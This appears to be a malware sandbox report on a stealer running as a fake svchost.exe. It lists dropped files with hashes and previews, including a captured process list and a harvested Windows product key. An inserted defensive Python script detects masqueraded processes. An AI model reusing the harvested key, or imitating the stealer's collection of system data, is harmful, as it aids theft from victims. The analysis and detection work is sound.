                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):3.5191090305155277
                                                  Encrypted:false
                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                  MD5:3A37312509712D4E12D27240137FF377
                                                  SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                  SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                  SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.514398793376306
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):20373
                                                  Entropy (8bit):5.758571071070943
                                                  Encrypted:false
                                                  SSDEEP:96:+ttrT2Zs9LaCwdMqO23KxcnBg+7UBG8nqACwKB6r8JbE9rfKYO+k2:+ttrT0sNa1dkig50LACwu6wJbE9ri2
                                                  MD5:5C1B87FDD31967C04E040AED31273A89
                                                  SHA1:2039C3C7B2268B858D1E3F8257373FA5B87E25EF
                                                  SHA-256:3296CFCF82A1702CACE1401375C8D71AE9F411B784A595497A3896DC301106B9
                                                  SHA-512:F541A6DE71EDAA99FCF9B8894CFF5B344771086FF423D90D1AB3E349FA4539445F0644AC1FA8B20FC532A2E620BF132CF568B6B54884BB11B4D5080D5BF97406
                                                  Malicious:false
                                                  Preview:NAME: sppsvc..PID: 6464..EXE: ..NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 4612..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: svchost..PID: 1716..EXE: C:\Users\user\AppData\Roaming\svchost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 3008..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: Windows Security Health Service..PID: 6024..EXE: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe..NAME: csrss..PID: 420..EXE: ..NAME: backgroundTaskHost..PID: 4292..EXE: C:\Windows\system32\backgroundTaskHost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 2136..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: svchost..PID: 5152..EXE: C:\Windows\system32\svchos
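The 20373-byte text file above is the stealer's own process inventory, written as NAME/PID/EXE triples. It already records the masquerading the report flags under "Drops PE files with benign system names": a second svchost.exe and a "Windows Security Health Service.exe" both running from C:\Users\user\AppData\Roaming. The Python below is an added example, not code from the Joe Sandbox report or from the malware: it parses that record layout and flags entries whose image name belongs to a Windows system binary but whose path is outside %SystemRoot%, or whose path lies in a user-writable profile directory. The sample input is reconstructed from the first nine complete records of the preview, assuming the ".." separators the sandbox shows are CRLF; the allow-list of system image names and the user-writable path markers are assumptions to extend for your own environment.

```python
"""Flag masqueraded processes in a stealer's process snapshot.

Record layout (three lines per process, as in the dropped file above):
    NAME: <image name without extension>
    PID: <decimal pid>
    EXE: <full image path, empty if the process could not be opened>
"""
from __future__ import annotations

from dataclasses import dataclass

# Constructed sample: the first nine complete records from the report preview.
# The sandbox renders non-printable bytes as '.', so its '..' separators are
# assumed to be CRLF and are written here as "\r\n".
SAMPLE_SNAPSHOT = "\r\n".join([
    "NAME: sppsvc", "PID: 6464", "EXE: ",
    "NAME: svchost", "PID: 2152", "EXE: C:\\Windows\\system32\\svchost.exe",
    "NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg", "PID: 4612",
    "EXE: C:\\Program Files (x86)\\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe",
    "NAME: svchost", "PID: 1716", "EXE: C:\\Users\\user\\AppData\\Roaming\\svchost.exe",
    "NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg", "PID: 3008",
    "EXE: C:\\Program Files (x86)\\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe",
    "NAME: Windows Security Health Service", "PID: 6024",
    "EXE: C:\\Users\\user\\AppData\\Roaming\\Windows Security Health Service.exe",
    "NAME: csrss", "PID: 420", "EXE: ",
    "NAME: backgroundTaskHost", "PID: 4292", "EXE: C:\\Windows\\system32\\backgroundTaskHost.exe",
    "NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg", "PID: 2136",
    "EXE: C:\\Program Files (x86)\\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe",
])

# Assumed allow-list: image names that legitimately run only from %SystemRoot%.
SYSTEM_IMAGE_NAMES = {
    "svchost", "csrss", "sppsvc", "backgroundtaskhost", "lsass", "winlogon",
    "smss", "wininit", "services", "explorer", "dwm", "taskhostw",
}

# Assumed markers of directories an unprivileged user can write to.
USER_WRITABLE_MARKERS = (
    "\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\",
)


@dataclass
class ProcessEntry:
    name: str
    pid: int
    exe: str  # empty when the stealer could not open the process


def _to_entry(rec: dict[str, str]) -> ProcessEntry:
    pid_text = rec.get("PID", "")
    pid = int(pid_text) if pid_text.isdigit() else -1
    return ProcessEntry(rec.get("NAME", ""), pid, rec.get("EXE", ""))


def parse_snapshot(text: str) -> list[ProcessEntry]:
    """Split the NAME/PID/EXE stream into one entry per process."""
    entries: list[ProcessEntry] = []
    current: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        key, sep, value = line.partition(":")  # first ':' only; paths keep their drive colon
        if not sep:
            continue  # tolerate blank or junk lines
        key, value = key.strip().upper(), value.strip()
        if key == "NAME":
            if current:
                entries.append(_to_entry(current))  # flush the previous record
            current = {"NAME": value}
        elif key in ("PID", "EXE") and current:
            current[key] = value
    if current:
        entries.append(_to_entry(current))
    return entries


def find_masquerades(entries: list[ProcessEntry],
                     system_root: str = "C:\\Windows") -> list[tuple[ProcessEntry, list[str]]]:
    """Return (entry, reasons) for every process that looks like a masquerade."""
    root = system_root.lower().rstrip("\\") + "\\"
    findings: list[tuple[ProcessEntry, list[str]]] = []
    for e in entries:
        if not e.exe:
            continue  # no path to judge (protected process the stealer could not open)
        path = e.exe.lower()
        reasons: list[str] = []
        if e.name.lower() in SYSTEM_IMAGE_NAMES and not path.startswith(root):
            reasons.append("system image name outside %SystemRoot%")
        if any(marker in path for marker in USER_WRITABLE_MARKERS):
            reasons.append("running from a user-writable directory")
        if reasons:
            findings.append((e, reasons))
    return findings


if __name__ == "__main__":
    for entry, reasons in find_masquerades(parse_snapshot(SAMPLE_SNAPSHOT)):
        print(f"PID {entry.pid:>5} {entry.name!r}: {entry.exe} -> {'; '.join(reasons)}")
```

Run against the sample, the two hits are PID 1716 (svchost.exe in Roaming, both reasons) and PID 6024 (the "Windows Security Health Service.exe" drop); the legitimate svchost.exe and backgroundTaskHost.exe under system32 are not reported. The same rules apply directly to a live process listing (for example the output of Get-Process with its Path property), where they catch this family's persistence copies before the stealer output ever reaches a sandbox.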
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):29
                                                  Entropy (8bit):3.935398667466764
                                                  Encrypted:false
                                                  SSDEEP:3:j9uyhIS+9m10D:BJZO
                                                  MD5:26091DB69F4A36FA295BE96E9040370F
                                                  SHA1:DFF23596F870E947521D853E896D92C88324FFE8
                                                  SHA-256:1D5640C0191BECDEADD9BE417100194CE6A028DCAC24979852A8FDC72CC7037A
                                                  SHA-512:8F4ED9781DDC5D787D575B3C854A0730671A78B438A59555F597FBB2869C2E2F264BB1B070358F9635A04F3488D3EE5A709651FAA95B4DD450464F5EC1C53FF3
                                                  Malicious:false
                                                  Preview:97XK9-N6YTD-7JJJ3-RCCP6-82GJ7
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):84
                                                  Entropy (8bit):4.6630509827051725
                                                  Encrypted:false
                                                  SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                  MD5:58CD2334CFC77DB470202487D5034610
                                                  SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                  SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                  SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                  Malicious:false
                                                  Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):15168
                                                  Entropy (8bit):5.743427958844179
                                                  Encrypted:false
                                                  SSDEEP:48:BfERfEsfEYfEGfEXfELfEafEmfEsfEcfEMFfEOfEhfEIfE7fExfEVfEcfEpfEofD:8c9Kqt++h
                                                  MD5:8B231306977EBD952F46B82C046A7E99
                                                  SHA1:C6C7D2C3A5C7795DC4971CAA16CBD1907053DDB6
                                                  SHA-256:1968C4FC3ABED14EF916182DDD8472EA397596DA086AF0FCA9A894BA51CBD8B6
                                                  SHA-512:8A576849CCD143743380A2E2A44F58391A643589E985834D9A3A795A6E48AF229CB95B03C031F7F586F2D33503DB253552881820F827731FDD2533CCAA9FDF5E
                                                  Malicious:false
